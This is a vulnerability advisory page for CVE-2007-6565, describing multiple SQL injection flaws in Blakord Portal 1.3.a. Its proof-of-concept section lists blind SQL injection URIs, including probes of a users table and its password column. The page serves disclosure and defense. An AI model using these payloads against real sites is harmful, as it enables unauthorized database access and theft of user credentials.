Blakord Portal Multiple SQL Injection Vulnerabilities

BID:27038

Info

Blakord Portal Multiple SQL Injection Vulnerabilities

Bugtraq ID: 27038
Class: Input Validation Error
CVE: CVE-2007-6565
Remote: Yes
Local: No
Published: Dec 26 2007 12:00AM
Updated: May 07 2015 05:34PM
Credit: JosS is credited with the discovery of these vulnerabilities.
Vulnerable: Blakord Portal Blakord Portal 1.3.a
Not Vulnerable:

Discussion

Blakord Portal Multiple SQL Injection Vulnerabilities

Blakord Portal is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

These issues affect Blakord Portal 1.3.a and prior versions.

Exploit / POC

Blakord Portal Multiple SQL Injection Vulnerabilities

Attackers may exploit these issues through a browser.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) >= 0
http://www.example.com/[path]/[any module]?id=1 and exists (select * from [TABLE])
http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) >= 0
http://www.example.com/[path]/[any module]?id=1 and exists (select * from users)
http://www.example.com/[path]/[any module]?id=1 and 1=1
http://www.example.com/[path]/[any module]?id=1 and 1=2
http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) = [NUMBER]
http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) = 6
http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count([COLUMN]) FROM [TABLE]) >= 0
http://www.example.com/[path]/[any module]?id=1 AND (SELECT Count(U_PASSWORD) FROM users) >= 0

Solution / Fix

Blakord Portal Multiple SQL Injection Vulnerabilities

Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].

References

Blakord Portal Multiple SQL Injection Vulnerabilities

References:

© CVE.report 2026

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report